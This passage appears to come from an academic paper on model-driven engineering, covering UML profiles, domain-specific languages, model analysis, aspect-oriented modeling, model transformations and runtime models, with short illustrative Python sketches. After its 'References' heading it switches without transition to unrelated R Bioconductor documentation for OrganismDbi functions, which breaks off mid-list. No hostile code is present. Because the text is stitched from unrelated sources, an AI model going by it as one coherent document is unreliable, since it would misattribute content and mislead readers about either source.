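    """Apply a stereotype to a model element, enforcing the profile's
    applicability and tagged-value constraints."""
    if element["metaclass"] != stereotype["extends"]:
        raise ValueError("stereotype not applicable to this metaclass")
    if set(tagged_values) - stereotype["tags"]:
        raise ValueError("unknown tagged value")
    element.setdefault("applied", {})[stereotype["name"]] = tagged_values
    return element

customer = {"metaclass": "Class", "name": "Customer"}
apply_stereotype(customer, STEREOTYPE, table="CUSTOMERS")
print(customer["applied"])   # {'EJBEntity': {'table': 'CUSTOMERS'}}
```

The checks illustrate the "must not contradict" constraint syntactically; what the profile mechanism cannot currently express, as discussed next, is the precise semantics the stereotype adds.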
The OMG currently manages many profiles, including the Profile for Schedulability, Performance and Time, and a system modeling profile called SysML. Unfortunately, the UML 2.0 profile mechanism does not provide a means for precisely defining the semantics associated with extensions. For this reason, profiles cannot be used in their current form to develop domain-specific UML variants that support the formal model manipulations required in an MDE environment. The XMF-Mosaic tool developed by Xactium takes a promising approach that is based on the use of meta-profiles and a reflective UML modeling environment that is able to adapt to extensions made to the UML.
5.3. Domain Specific Modeling Environments
A domain specific language consists of constructs that capture phenomena in the domain it describes. Domain specific languages (DSLs) cover a wide range of forms [15]. A DSL may be used for communication between software components (e.g., XML dialects), or it may be embedded in a wizard that iteratively asks a user for configuration information.
DSLs can help bridge the problem-implementation gap, but their use raises new challenges:
- **Enhanced tooling challenge**: Each DSL needs its own set of tools (editor, checker, analyzers, code generators). These tools will need to evolve as the domain evolves. Building and evolving these tools using manual techniques can be expensive. A major challenge for DSL researchers is developing the foundation needed to produce efficient meta-toolsets for DSL development.
- **The DSL-Babel challenge**: The use of many DSLs can lead to significant interoperability, language-version and language-migration problems. This problem poses its own challenges with respect to training and communication across different domains. DSLs will evolve and will be versioned and so must the applications that are implemented using the DSLs. Furthermore, different parts of the same system may be described using different DSLs and thus there must be a means to relate concepts across DSLs and a means to ensure consistency of concept representations across the languages. Sound integration of DSLs will probably be as hard to achieve as the integration of various types of diagrams in a UML model.
The developers responsible for creating and evolving DSL tools will need to have intimate knowledge of the domain and thus must closely interact with application developers. Furthermore, the quality of the DSL tools should be a primary concern, and quality assurance programs for the DSL tooling sector of an organization should be integrated with the quality assurance programs of the application development sectors. These are significant process and management challenges.
In addition to these challenges many of the challenges associated with developing standardized modeling languages apply to DSLs.
5.4. Developing Formal Modeling Languages
Formal methods tend to restrict their modeling viewpoints in order to provide powerful analysis, transformation and generation techniques. A challenge is to integrate formal techniques with MDE approaches that utilize modeling languages with a rich variety of viewpoints. A common approach is to translate a modeling view (e.g., a UML class model) to a form that can be analyzed using a particular formal technique (e.g., see [42]). For example, there are a number of approaches to transforming UML design views to representations that can be analyzed by model checking tools. The challenges here are to (a) ensure that the translation is semantically correct, and (b) hide the complexities of the target formal language and tools from the modeler. Meeting the latter challenge involves automatically translating the analysis results to a form that utilizes concepts in the source modeling language.
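The translation approach can be sketched end to end on a tiny example: a design-level state machine view is mapped to a plain transition system, explored exhaustively, and the result is reported back in terms of the source model (here, unreachable states), so the modeler never sees the analysis representation. The state machine below is invented for illustration.

```python
from collections import deque

# Source modeling view: a simple state machine (invented example).
STATE_MACHINE = {
    "initial": "Idle",
    "states": ["Idle", "Active", "Done", "Error"],
    "transitions": [("Idle", "start", "Active"),
                    ("Active", "finish", "Done"),
                    ("Done", "reset", "Idle")],
}

def unreachable_states(sm):
    """Translate the view to a successor relation, run exhaustive
    reachability, and report results in source-model terms."""
    succ = {}
    for src, _event, dst in sm["transitions"]:
        succ.setdefault(src, []).append(dst)
    seen, queue = {sm["initial"]}, deque([sm["initial"]])
    while queue:
        for dst in succ.get(queue.popleft(), []):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return [s for s in sm["states"] if s not in seen]

print(unreachable_states(STATE_MACHINE))  # ['Error']
```

Real model checkers handle vastly larger state spaces and richer properties, but the shape of the pipeline (translate, analyze, report back in source terms) is the one described above.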
Another approach would be to integrate the analysis/generation algorithms with the existing modeling language. This is more expensive, but would greatly enhance the applicability of an analysis tool to an existing modeling language.
In the formal methods community the focus is less on developing new formal languages and more on tuning existing notations and techniques. MDE languages provide a good context for performing such tuning.
5.5. Analyzing Models
If models are the primary artifacts of development then one has to be concerned with how their quality is evaluated. Good modeling methods should provide modelers with criteria and guidelines for developing quality models. These guidelines can be expressed in the form of patterns (e.g., Craig Larman’s GRASP patterns), proven rules of thumb (e.g., “minimize coupling, maximize cohesion”, “keep inheritance depth shallow”), and exemplar models. The reality is that modelers ultimately rely on feedback from experts to determine “goodness” of their models. For example, in classrooms the instructors play the role of expert modelers and students are apprentices. From the student perspective, the grade awarded to a model reflects its “goodness”. The state of the practice in assessing model quality provides evidence that modeling is still in the craftsmanship phase.
Research on rigorous assessment of model quality has given us a glimpse of how we can better evaluate model quality. A number of researchers are working on developing rigorous static analysis techniques that are based on well-defined models of behaviors. For example, there is considerable work on model-checking of modeled behavior (e.g., see [39]).
Another promising area of research is systematic model testing. Systematic code testing involves executing programs on a select set of test inputs that satisfy some test criteria. These ideas can be extended to the modeling phases when executable forms of models are used. Model testing is concerned with providing modelers with the ability to animate or execute the models they have created in order to explore the behavior they have modeled.
The notion of model testing is not new. For example, SDL (Specification and Description Language) tools provide facilities for exercising the state-machine based models using an input set of test events. Work on executable variants of the UML also aims to provide modelers with feedback on the adequacy of their models. More recently a small, but growing, number of researchers have begun looking at developing systematic model testing techniques. This is an important area of research and helps pave the way for more effective use of models during software development.
There may be lessons from the systematic code testing community that can be applied, but the peculiarities of modeling languages may require the development of innovative approaches. In particular, innovative work on defining effective test criteria that are based on coverage of model elements and on the generation of model-level test cases that provide desired levels of coverage is needed.
The ability to animate models can help one better understand modeled behavior. Novices and experienced developers will both benefit from the visualization of modeled behavior provided by model animators. Model animation can provide quick visual feedback to novice modelers and can thus help them identify improper use of modeling constructs. Experienced modelers can use model animation to understand designs created by other developers better and faster.
It may also be useful to look at how other engineering disciplines determine the quality of their models. Engineers in other disciplines typically explore answers to the following questions when determining the adequacy of their models: Is the model a good predictor of how the physical artifact will behave? What are the assumptions underlying the model and what impact will they have on actual behavior? The answer to the first question is often based on evidence gathered from past applications of the model. Evidence of model fidelity is built up by comparing the actual behavior of systems built using the models with the behavior predicted by the models. Each time engineers build a system the experience gained either reinforces their confidence in the predictive power of the models used or the experience is used to improve the predictive power of models. Answers to the second question allow engineers to identify the limitations of analysis carried out using the models and develop plans for identifying and addressing problems that arise when the assumptions are violated.
Are similar questions applicable to software models? There are important differences between physical and software artifacts that one needs to take into consideration when applying modeling practices in other engineering disciplines to software, but there may be some experience that can be beneficially applied to software modeling.
6. Supporting Separation of Design Concerns
Developers of complex software face the challenge of balancing multiple interdependent, and sometimes conflicting, concerns in their designs. Balancing pervasive dependability concerns (e.g., security and fault tolerance concerns) is particularly challenging: The manner in which one concern is addressed can limit how other concerns are addressed, and interactions among software features that address the concerns can give rise to undesirable emergent behavior. Failure to identify and address faults arising from interacting dependability features during design can lead to costly system failures. For example, the first launch of the space shuttle Columbia was delayed because “(b)ackup flight software failed to synchronize with primary avionics software system” (see http://science.ksc.nasa.gov/shuttle/missions/sts-1/mission-sts-1.html). In this case, features that were built in to address fault-tolerance concerns did not interact as required with the primary functional features. Design modeling techniques should allow developers to separate these features so that their interactions can be analyzed to identify faulty interactions and to better understand how emergent behavior arises.
Modeling frameworks such as the MDA advocate modeling systems using a fixed set of viewpoints (e.g., the CIM, PIM, and PSM MDA views). Rich modeling languages such as the UML provide good support for modeling systems from a fixed set of viewpoints. Concepts used in a UML viewpoint are often dependent on concepts used in other viewpoints. For example, participants in a UML interaction diagram must have their classifiers (e.g., classes) defined in a static structural model. Such dependencies are specified in the language metamodel and thus the metamodel should be the basis for determining consistency of information across system views. Unfortunately, the size and complexity of the UML 2.0 metamodel makes it extremely difficult for tool developers and researchers to fully identify the dependencies among concepts, and to determine whether the metamodel captures all required dependencies. In the previous section we discussed the need for tools that query and navigate metamodels of large languages such as the UML. These tools will also make it easier to develop mechanisms that check the consistency of information across views.
---
²In this paper, a feature is a logical unit of behavior.
The fixed set of viewpoints provided by current modeling languages and frameworks such as the MDA and UML are useful, but more is needed to tackle the complexity of developing software that address pervasive interdependent concerns. The need for better separation of concerns mechanisms arises from the need to analyze and evolve interacting pervasive features that address critical dependability concerns. A decision to modularize a design based on a core set of functional concerns can result in the spreading and tangling of dependability features in a design. The tangling of the features in a design complicates activities that require understanding, analyzing, evolving or replacing the crosscutting features. Furthermore, trade-off analysis tasks that require the development and evaluation of alternative forms of features are difficult to carry out when the features are tangled and spread across a design. These crosscutting features complicate the task of balancing dependability concerns in a design through experimentation with alternative solutions.
Modeling languages that provide support for creating and using concern-specific viewpoints can help alleviate the problems associated with crosscutting features. Developers can use a concern-specific viewpoint to create a design view that describes how the concern is addressed in a design. For example, developers can use an access control security viewpoint to describe access control features at various levels of abstraction.
A concern-specific viewpoint should, at least, consist of (1) modeling elements representing concern-specific concepts at various levels of abstractions, and (2) guidelines for creating views using the modeling elements. To facilitate their use, the elements can be organized as a system of patterns (e.g., access control patterns) or they can be used to define a domain-specific language (DSL) for the concern space. For example, a DSL for specifying security policies can be used by developers to create views that describe application-specific security policies. Supporting the DSL approach requires addressing the DSL challenges discussed in Section 5. Furthermore, the need to integrate views to obtain a holistic view of a design requires the development of solutions to the difficult problem of integrating views expressed in different DSLs. One way to integrate these views is to define a metamodel that describes the relationships among concepts defined in the different viewpoints. An interesting research direction in this respect concerns the use of ontologies to develop such metamodels. An ontology describes relationships among concepts in a domain of discourse. One can view a metamodel as an ontology and thus we should be able to leverage related work on integrating ontologies in work on integrating views described using different ontologies.
Another approach to supporting the definition and use of concern-specific viewpoints is based on the use of aspect-oriented modeling (AOM) techniques. These approaches describe views using general-purpose modeling languages and provide mechanisms for integrating the views. In this section we discuss the AOM approach in more detail and present some of the major challenges that must be met to realize its research goals.
6.1. Separating Concerns using Aspect Oriented Modeling Techniques
Work on separating crosscutting functionality at the programming level has led to the development of aspect-oriented programming (AOP) languages such as AspectJ [35]. Work on modeling techniques that utilize aspect concepts can be roughly partitioned into two categories: Those that provide techniques for modeling aspect-oriented programming (AOP) concepts [36], and those that provide requirements and design modeling techniques that tackle the problem of isolating features in modeling views and analyzing interactions across the views. Work in the first category focuses on modeling AOP concepts such as join points and advice using either lightweight or heavyweight extensions of modeling languages such as the UML (e.g., see [13, 37, 41, 56, 55]). These approaches lift AOP concepts to the design modeling level and thus ease the task of transforming design models to AOP programs. On the other hand, these approaches utilize concepts that are tightly coupled with program-level abstractions supported by current AOP languages.
Approaches in the second category (e.g., see [1, 5, 12, 23, 47]) focus more on providing support for separating concerns at higher levels of abstractions. We refer to approaches in this category as AOM approaches. The Theme approach and the AOM approach developed by the Colorado State University (CSU) AOM group exemplify work on AOM. In these approaches, aspects are views that describe how a concern is addressed in a design. These views are expressed in the UML and thus consist of one or more models created using the UML viewpoints.
The model elements in aspect and primary models provide partial views of design concepts.
Current composition techniques are based on rules for syntactically matching elements across aspect and primary models, which makes it possible to fully automate the composition. The matching rules use syntactic properties (e.g., model element name) to determine whether two model elements represent the same concept or not. For example, a matching rule stating that classes with the same name represent the same concept can be used to merge classes with the same name but different attributes and operations. The composed class will contain the union of the attributes and operations found in the classes that are merged. This reliance on an assumed correspondence between syntactic properties and the concepts represented by model elements can lead to conflicts and other problems when it does not exist. There is a need to take into consideration semantic properties, expressed as constraints or as specifications of behavior, when matching model elements.
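The name-based merge rule described above can be sketched as follows. This is a hypothetical illustration: the representation of a model as a dictionary mapping class names to attribute and operation sets is our own assumption, not the format of any real AOM tool.

```python
# Illustrative sketch of syntactic model composition: classes in an aspect
# model and a primary model are matched by name, and matched classes are
# merged by taking the union of their attributes and operations.

def compose(primary, aspect):
    """Merge two models (dicts: class name -> {"attrs": set, "ops": set})
    using a purely syntactic, name-based matching rule."""
    composed = {}
    for name in set(primary) | set(aspect):
        p = primary.get(name, {"attrs": set(), "ops": set()})
        a = aspect.get(name, {"attrs": set(), "ops": set()})
        composed[name] = {
            "attrs": p["attrs"] | a["attrs"],  # union of attributes
            "ops": p["ops"] | a["ops"],        # union of operations
        }
    return composed
```

For example, merging a primary `Account` class having a `balance` attribute with an aspect `Account` class contributing a `log` attribute and an `audit` operation yields a composed class with both attributes and both operations, purely on the strength of the shared name.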
Consideration of semantic properties is also needed to support verifiable composition. Composition is carried out in a verifiable manner when it can be established that the model it produces has specified properties. A composition tool should be able to detect when it has failed to establish or preserve a specified property and report this to the modeler. Such checks cannot be completely automated, but it may be possible to provide automated support for detecting particular types of semantic conflicts and other interaction problems.
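One narrow kind of semantic conflict that a composition tool could plausibly detect automatically is a disagreement between same-named elements, for instance two attributes that match syntactically but carry different declared types. The sketch below is our own illustration of that idea; the model representation and the API are invented, not taken from any real composition tool.

```python
# Hypothetical sketch of detecting one kind of semantic conflict during
# composition: same-named attributes whose declared types disagree.
# A purely syntactic merge would silently pick one; here the tool records
# the conflict so it can be reported to the modeler.

def compose_checked(primary, aspect):
    """Models map class name -> {attribute name -> type name}.
    Returns (composed_model, conflicts)."""
    composed, conflicts = {}, []
    for cls in set(primary) | set(aspect):
        merged = dict(primary.get(cls, {}))
        for attr, typ in aspect.get(cls, {}).items():
            if attr in merged and merged[attr] != typ:
                # syntactic match, semantic mismatch: report, don't merge
                conflicts.append((cls, attr, merged[attr], typ))
            else:
                merged[attr] = typ
        composed[cls] = merged
    return composed, conflicts
```

Richer semantic checks (constraints, behavioral specifications) would follow the same pattern: attempt the merge, then verify the specified properties on the result and report any that fail to hold.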
Another major challenge faced by AOM researchers is concerned with integrating AOM techniques into the software development process. Evolution and transformation of models consisting of multiple interrelated views becomes more complex if the necessary infrastructure for managing the views is not present. The challenges associated with developing such an infrastructure are discussed in Section 7.2.
6.2. Related Research on Requirements Views and Feature Interactions
Work on requirements and architecture viewpoints [52], and on the feature interaction problem [11] can provide valuable insights that can be used to understand the challenges of separating design concerns and of analyzing interactions. The terms views and viewpoints tend to be associated with work on requirements analysis, but they can also be applied to designs. A design concern such as access control can be considered to be a design viewpoint. Such a viewpoint can provide concepts, patterns or a language that can be used to create design views that describe features addressing the design concern.
Work on feature interactions has tended to focus on features that provide services of value to software users. For example, in the telecommunication industry a feature is a telecommunication service such as call-forwarding, and research on the feature interaction problem in this domain is concerned with identifying undesirable emergent behaviors that arise when these services interact. There is a growing realization that the feature interaction problem can appear in many forms in software engineering. The problem of analyzing interactions among features that address dependability and other design concerns is another variant of the feature interaction problem. One can also consider work on analyzing interactions across views as a form of the feature interaction problem.
Collaborative research involving members from the AOM, the formal methods, the feature interaction and the viewpoint analysis communities is needed to address the challenging problems associated with separating concerns and integrating overlapping views.
7. Manipulating Models
Current MDE technologies provide basic support for storing and manipulating models. Environments typically consist of model editors which can detect some syntactic inconsistencies, basic support for team development of models, and limited support for transforming models. Much more is needed if MDE is to succeed. For example, there is a need for rigorous transformation modeling and analysis techniques, and for richer repository-based infrastructures that can support a variety of model manipulations, can maintain traceability relationships among a wide range of models, and can better support team-based development of models. In this section we discuss some of the major MDE challenges related to providing support for manipulating and managing models. The section also includes a discussion on the use of models to support runtime activities.
7.1. Model Transformation Challenges
A (binary) model transformation defines a relationship between two sets of models. If one set of models is designated as a source set and the other as a target set then a mechanism that implements such a transformation will take the source set of models and produce the target set of models. These are called operational transformations in this paper. Model refinement, abstraction, and refactoring are well-known forms of operational transformations. Other forms that will become more widely used as MDE matures are (1) model composition in which the source models representing different views are used to produce a model that integrates the views, (2) model decomposition in which a single model is used to produce multiple target models, and (3) model translation in which a source set of models is transformed into target models expressed in a different language. In particular, model translations are used to transform models created for one purpose into models that are better suited for other purposes. Examples of translations can be found in work on transforming UML models to artifacts that can be formally analyzed using existing analysis tools. This includes work on transforming UML to formal specification languages such as Z and Alloy, to performance models, and to state machine representations that can be analyzed by existing model checkers.
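A minimal operational transformation can be sketched as a function from a source model to a target model. The example below translates a toy class model into a relational schema, a classic model-translation exercise; the model representations are our own illustrative assumptions, not QVT or any standard transformation language.

```python
# Sketch of an operational model-to-model translation: a source class
# model is taken as input and a target relational model is produced.

def classes_to_tables(class_model):
    """Source: list of {"name": ..., "attrs": [...]} class descriptions.
    Target: dict mapping table name -> column list, with a generated
    surrogate primary-key column added to each table."""
    schema = {}
    for cls in class_model:
        # each class becomes one table; attributes become columns
        schema[cls["name"].lower()] = ["id"] + list(cls["attrs"])
    return schema
```

Running the transformation on `[{"name": "Customer", "attrs": ["name", "email"]}]` produces `{"customer": ["id", "name", "email"]}`. Real transformations differ mainly in scale and in being expressed declaratively, but the source-in, target-out shape is the same.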
Transformations can also be used to maintain relationships among sets of models: Changes in the models in one set trigger changes in the other sets of models in order to maintain specified relationships. These synchronization transformations are used to implement change synchronization mechanisms in which changes to a model (e.g., a detailed UML design model) trigger corresponding changes in related artifacts (e.g., code generated from the UML design model).
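The synchronization idea can be sketched very simply: keep a derived artifact consistent with its source model by re-running the mapping whenever the model changes. Everything in this sketch is our own illustration; real change-synchronization mechanisms are incremental rather than recomputing the whole target.

```python
# Hypothetical sketch of a synchronization transformation: changes to the
# source model trigger corresponding changes in a derived artifact (here,
# generated code stubs) so that the specified relationship is maintained.

class SyncedView:
    def __init__(self, model, mapping):
        self.model = model
        self.mapping = mapping
        self.artifact = mapping(model)          # initial generation

    def update(self, change):
        change(self.model)                      # apply change to the source
        self.artifact = self.mapping(self.model)  # ripple to the target

# usage: a model of operations mapped to generated function stubs
model = {"ops": ["open"]}
view = SyncedView(model, lambda m: [f"def {op}(): ..." for op in m["ops"]])
view.update(lambda m: m["ops"].append("close"))
```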
Research on model transformations is still in its infancy and there is very little experience that can be used to determine the worth of current approaches. The OMG’s Query, View, Transformation (QVT) standard defines three types of transformation languages: two declarative languages that describe relations at different levels of abstraction, and an operational transformation language that describes transformations in an imperative manner. In addition to the QVT, there are a number of other proposals for transformation languages. An informative survey of transformation language features can be found in the paper by Czarnecki [16].
More research is needed on analyzing model transformations. The complex structure of models poses special challenges in this respect. As mentioned previously, a model is a collection of interrelated views. The following are some of the difficult research questions that arise from the multi-view nature of models:
- How does one maintain consistency across views as they are transformed? Synchronization transformation technologies may be used here to “ripple” the results of transformations to related views.
- How can transformations be tested? The complex structure of the models may stretch the limits of current formal static analysis and testing techniques. For testing techniques, the complex structures make definition of oracles and effective coverage criteria particularly challenging.
A particular challenge faced by developers of model-to-code transformations is integrating generated code with handcrafted or legacy code. Current code generation tools assume that generated code is stand-alone and provide very little support for integration of foreign code. Integrating foreign and generated code is easier if they are architecturally compatible. Unfortunately, current code generators do not make explicit the architectural choices that are made by the generators when they produce code and provide very limited support for affecting those choices. This makes it difficult to guarantee that a code generator will produce code that is architecturally compatible with foreign code. The result is that some refactoring of the generated and foreign code may be needed, or a separate “glue” interface needs to be developed. It may be possible to generate the needed refactoring steps or the “glue” code given appropriate information about the foreign and generated code. Research on techniques for generating these artifacts will have to determine the needed information.
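One established way to keep generated and handcrafted code architecturally compatible, in the spirit of the discussion above, is the "generation gap" idiom: the generator emits a base class that is never edited by hand, and foreign or handcrafted logic lives in a subclass that overrides designated hook methods. Regenerating the base class then does not clobber the hand-written code. The classes below are an illustrative sketch, not output of any real generator.

```python
# Generation gap idiom: generated base class + handcrafted subclass.

class GeneratedOrderBase:
    """Regenerated from the model on every run; never edited by hand."""
    def process(self, order):
        self.validate(order)          # call the designated hook
        return f"processed:{order}"

    def validate(self, order):        # hook left open for foreign code
        pass

class Order(GeneratedOrderBase):
    """Handcrafted subclass; survives regeneration of the base class."""
    def validate(self, order):
        if not order:
            raise ValueError("empty order")
```

The design choice here is that the generator makes its architectural contract explicit (the hook methods), which is exactly the information the text argues current code generators fail to expose.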
7.2. Model Management Challenges
In a project, many models at varying levels of abstractions are created, evolved, analyzed and transformed. Manually tracking the variety of relationships among the models (e.g., versioning, refinement, realization and dependency relationships) adds significant accidental complexity to the MDE development process. Current modeling tools do not provide the support needed to effectively manage these relationships.
An MDE repository must have the capability to store models produced by a variety of development tools, and must be open and extensible in order to support a close approximation of the MDE vision. The repository should (1) allow tools from a variety of vendors to manipulate the models, (2) monitor and audit the model manipulations, and (3) automatically extract information from the audits and use it to establish, update or remove relationships among models. Developing such a repository requires addressing difficult technical problems. Problems associated with maintaining artifact traceability relationships are notoriously challenging and two decades of research on these problems have not produced convenient solutions.
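The three repository capabilities listed above can be sketched together: store models, audit every manipulation, and derive traceability relationships automatically from the audit trail. The API below is invented for illustration only.

```python
# Illustrative sketch of an MDE repository that audits model manipulations
# and automatically extracts "derived-from" relationships from the audits.

class ModelRepository:
    def __init__(self):
        self.models = {}
        self.audit = []          # (tool, operation, inputs, output) records
        self.relations = set()   # (target, "derived-from", source) triples

    def store(self, name, model):
        self.models[name] = model

    def record(self, tool, op, inputs, output):
        """Called by tools after each manipulation; the repository derives
        relationships between the output model and its input models."""
        self.audit.append((tool, op, tuple(inputs), output))
        for src in inputs:
            self.relations.add((output, "derived-from", src))
```

A code generator would, for instance, call `record("codegen", "to-code", ["design"], "code")`, after which the repository knows `code` is derived from `design` without any manual bookkeeping.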
Research in the area of Mega-Modeling, in which models are the units of manipulation, targets the problems associated with managing and manipulating models [9]. Metamodels play a critical role in mega-modeling: Mechanisms that manipulate models work at the metamodel level and information about artifacts stored in a repository can be captured in their metamodels.
Metamodels need to define more than just the abstract syntax of a language if they are to support model management tools. For example, the UML 2.0 metamodel is a class model in which the classes have get, set and helper functions that are used only to specify the abstract syntax and well-formedness rules. Metamodels should be able to use the full power of modeling languages to define both syntactic and semantic aspects of languages. For example, one can define semantics that determine how models in a language are to be transformed by including supporting operations in the metamodel. Furthermore, the metamodel does not have to consist only of a class model. One can use behavioral models (e.g., activity and sequence models) to describe the manipulations that can be carried out on models.
Tools that manipulate models can be associated with metamodels that describe how manipulations are implemented. This information can be used by MDE model management environments to extract information needed to maintain relationships among models that are manipulated by the tools. The KerMeta tool is an example of a new generation of MDE tools that allows one to extend metamodels with operations defining model manipulations [45, 61].
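The idea of a metamodel that carries behavior as well as abstract syntax, in the spirit of the KerMeta-style tools mentioned above, can be sketched as a metaclass that bundles a well-formedness check and a model manipulation alongside the structure it defines. The API is entirely our own illustration.

```python
# Sketch of an "executable metamodel" element: the metaclass for
# state-machine models defines structure, a well-formedness rule, and an
# operation that manipulates (analyzes) conforming models.

class StateMachineMeta:
    def __init__(self, states, transitions, initial):
        self.states = set(states)
        self.transitions = dict(transitions)  # (state, event) -> state
        self.initial = initial

    def well_formed(self):
        # semantic rule carried in the metamodel, not just abstract syntax
        return self.initial in self.states and all(
            s in self.states and t in self.states
            for (s, _), t in self.transitions.items())

    def reachable(self):
        # a model manipulation defined directly in the metamodel
        seen, frontier = {self.initial}, [self.initial]
        while frontier:
            s = frontier.pop()
            for (src, _), dst in self.transitions.items():
                if src == s and dst not in seen:
                    seen.add(dst)
                    frontier.append(dst)
        return seen
```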
7.3. Supporting the use of Models During Runtime: Opportunities and Challenges
Examples of how runtime models can be used by different system stakeholders are given below:
- System users can use runtime models to observe the runtime behavior when trying to understand a behavioral phenomenon (e.g., understanding the conditions under which transaction bottlenecks occur in a system), and to monitor specific aspects of the runtime environment (e.g., monitoring patterns of access to highly-sensitive information).
- Adaptation agents can use runtime models to detect the need for adaptation and to effect the adaptations. Effecting an adaptation involves making changes to models of the parts to be adapted and submitting the changes to an adaptation mechanism that can interpret and perform the needed adaptations. Here it is assumed that the adaptations to be performed are pre-determined.
- In more advanced systems, change agents (maintainers or software agents) can use the runtime models to correct design errors or to introduce new features to a running system. Unlike adaptations, these changes are not pre-determined and thus the mechanisms used to effect the changes can be expected to be more complex. These more complex mechanisms will be able to support pre-determined adaptations as well as unanticipated modifications.
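The adaptation-agent case above can be sketched concretely: a runtime model mirrors the observable state of a running component, and the agent both detects the need for adaptation through the model and effects a pre-determined adaptation through it. All names and the component representation are illustrative assumptions.

```python
# Hypothetical sketch of a runtime model and an adaptation agent.

class RuntimeModel:
    """Mirrors the live state of a running component and exposes a
    causally connected interface for effecting changes to it."""
    def __init__(self, component):
        self.component = component

    @property
    def queue_depth(self):
        return len(self.component["queue"])   # reflect live state

    def set_workers(self, n):
        self.component["workers"] = n         # effect the adaptation

def adaptation_agent(model, threshold=10):
    """Pre-determined adaptation: double the workers when the observed
    queue depth crosses a threshold."""
    if model.queue_depth > threshold:
        model.set_workers(model.component["workers"] * 2)
```

The unanticipated-change case in the third bullet would need a far richer interface, since the agent could not rely on a fixed adaptation like `set_workers` being known in advance.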
Research on providing support for creating and using runtime models is in its infancy. At the MODELS workshop on runtime models, Gordon Blair identified the following research questions: What forms should runtime models take? How can the fidelity of the models be maintained? What role should the models play in validation of the runtime behavior? These questions are good starting points for research in the area.
Providing support for changing behavior during runtime is particularly challenging. If models are to be used to effect changes to running software, research needs to focus on how the changes can be effected in a controlled manner. Allowing developers to change runtime behavior in an ad-hoc manner is obviously dangerous. A model-based runtime change interface will have to constrain how changes are effected and provide the means to check the impact of change before applying it to the running system.
8. Conclusions
In this paper we suggest that MDE research focus on providing technologies that address the recurring problem of bridging the problem-implementation gap. We also encourage research on the use of runtime models. The problems and challenges outlined in this paper are difficult to overcome, and it may seem that MDE techniques are more likely to contribute to the complexity of software development rather than manage inherent software complexity. It is our view that software engineering is inherently a modeling activity, and that the complexity of software will overwhelm our ability to effectively maintain mental models of a system. By making the models explicit and by using tools to manipulate, analyze and manage the models and their relationships, we are relieving significant cognitive burden and reducing the accidental complexities associated with maintaining mentally held models.
The web of models maintained in an MDE environment should be a reflection of inherent software complexity. Currently, creating software models is an art and thus models of faulty or convoluted solutions, and messy descriptions of relatively simple solutions can be expected. These modeling problems will give rise to accidental complexities.
There will always be accidental complexities associated with learning and using modeling languages and MDE tools to develop complex software. MDE technologists should
leverage accumulated experience and insights gained from failed and successful applications of previous MDE technologies to develop new technologies that reduce the accidental complexities of the past.
To conclude the paper we present a vision of an MDE environment that, if realized, can conceivably result in order-of-magnitude improvement in software development productivity and quality. The vision is intentionally ambitious and may not be attainable in its entirety. Progressively closer approximations of the vision will have increasingly significant effects on the effort required to develop complex software. In this sense, the vision can act as a point of reference against which MDE research progress can be informally assessed.
In the MDE vision, domain architects will be able to produce domain specific application development environments (DSAEs) using what we will refer to as MDE technology frameworks. Software developers will use DSAEs to produce and evolve members of an application family. A DSAE consists of tools to create, evolve, analyze, and transform models to forms from which implementation, deployment and runtime artifacts can be generated. Models are stored in a repository that tracks relationships across modeled concepts and maintains metadata on the manipulations that are performed on models.
Some of the other features that we envisage will be present in a DSAE are (1) mechanisms supporting round-trip engineering, (2) mechanisms for synchronizing models at different levels of abstraction when changes are made at any level, and (3) mechanisms for integrating generated software with legacy software. Developers should also be able to use mechanisms in the DSAE to incorporate software features supporting the generation and use of runtime models.
Realizing the MDE vision of software engineering is a wicked problem and thus MDE environments that lead to order-of-magnitude improvements in software productivity and quality are not likely to appear in the near to medium-term - barring new insights that could lead to significant improvement in the rate at which pertinent technologies are developed. The current limitations of MDE technologies reflect inadequacies in our understanding of the software modeling phenomenon. The development and application of progressively better MDE technologies will help deepen our understanding and move us closer to better approximations of the MDE vision.
Acknowledgments: Robert France’s work on this paper was supported by a Lancaster University project VERA: Verifiable Aspect Models for Middleware Product Families, funded by the UK Engineering and Physical Sciences Research Council (EPSRC) Grant EP/E005276/1. This work is also partly undertaken within the MODELPLEX project funded by the EU under the IST Programme. The authors thank the editors and following persons for their valuable feedback on drafts of the paper: Nelly Bencomo, Gordon Blair, Betty Cheng, Tony Clarke, Steve Cook, Andy Evans, Awais Rashid, Bran Selic, Richard Taylor, Laurie Tratt.
References
Description The package enables a simple unified interface to several annotation packages, each of which has its own schema, by taking advantage of the fact that each of these packages implements a select method.
Version 1.16.0
Author Marc Carlson, Herve Pages, Martin Morgan, Valerie Obenchain
Maintainer Biocore Data Team <maintainer@bioconductor.org>
Depends R (>= 2.14.0), methods, BiocGenerics (>= 0.15.10), AnnotationDbi (>= 1.33.15), GenomicFeatures (>= 1.23.31)
Imports Biobase, BiocInstaller, GenomicRanges, graph, IRanges, RBGL, RSQLite, S4Vectors (>= 0.9.25), stats
Suggests Homo.sapiens, Rattus.norvegicus, BSgenome.Hsapiens.UCSC.hg19, AnnotationHub, FDb.UCSC.tRNAs, rtracklayer, biomaRt, RUnit
License Artistic-2.0
biocViews Annotation, Infrastructure
NeedsCompilation no
R topics documented:
- makeOrganismDbFromBiomart
- makeOrganismDbFromTxDb
- makeOrganismDbFromUCSC
- makeOrganismPackage
- mapToTranscripts
- MultiDb-class
- rangeBasedAccessors
**makeOrganismDbFromBiomart**
*Make a OrganismDb object from annotations available on a BioMart database*
**Description**
The `makeOrganismDbFromBiomart` function allows the user to make a OrganismDb object from transcript annotations available on a BioMart database. This object has all the benefits of a TxDb, plus an associated OrgDb and GODb object.
**Usage**
```r
makeOrganismDbFromBiomart(biomart = "ENSEMBL_MART_ENSEMBL",
                          dataset = "hsapiens_gene_ensembl",
                          transcript_ids = NULL,
                          circ_seqs = DEFAULT_CIRC_SEQS,
                          filter = "",
                          id_prefix = "ensembl_",
                          host = "www.ensembl.org",
                          port = 80,
                          miRBaseBuild = NA,
                          keytype = "ENSEMBL",
                          orgdb = NA)
```
**Arguments**
- `biomart` which BioMart database to use. Get the list of all available BioMart databases with the `listMarts` function from the biomaRt package. See the details section below for a list of BioMart databases with compatible transcript annotations.
- `dataset` which dataset from BioMart. For example: "hsapiens_gene_ensembl", "mmusculus_gene_ensembl", "dmelanogaster_gene_ensembl", "celegans_gene_ensembl", "scerevisiae_gene_ensembl", etc in the ensembl database. See the examples section below for how to discover which datasets are available in a given BioMart database.
